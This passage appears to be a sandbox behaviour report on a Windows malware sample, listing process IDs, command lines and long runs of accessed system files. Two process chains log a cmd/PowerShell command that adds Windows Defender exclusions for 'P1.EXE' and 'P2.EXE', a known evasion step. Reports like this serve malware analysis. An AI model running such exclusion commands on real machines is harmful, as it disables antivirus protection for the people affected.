C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
1596
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P1.EXE'"
Time lapse
2.040827
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
Process children
1976
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P1.EXE'"
Time lapse
2.583254
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\GAMEUX.DLL.MUI
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\8XSEURBKIJZ9I1OAGOAD.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFA811.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
2300
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P2.EXE'"
Time lapse
2.32324
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
Process children
3080
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P2.EXE'"
Time lapse
2.722261
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\PSKUL7GJMAB0ONUO017P.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFA7B3.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
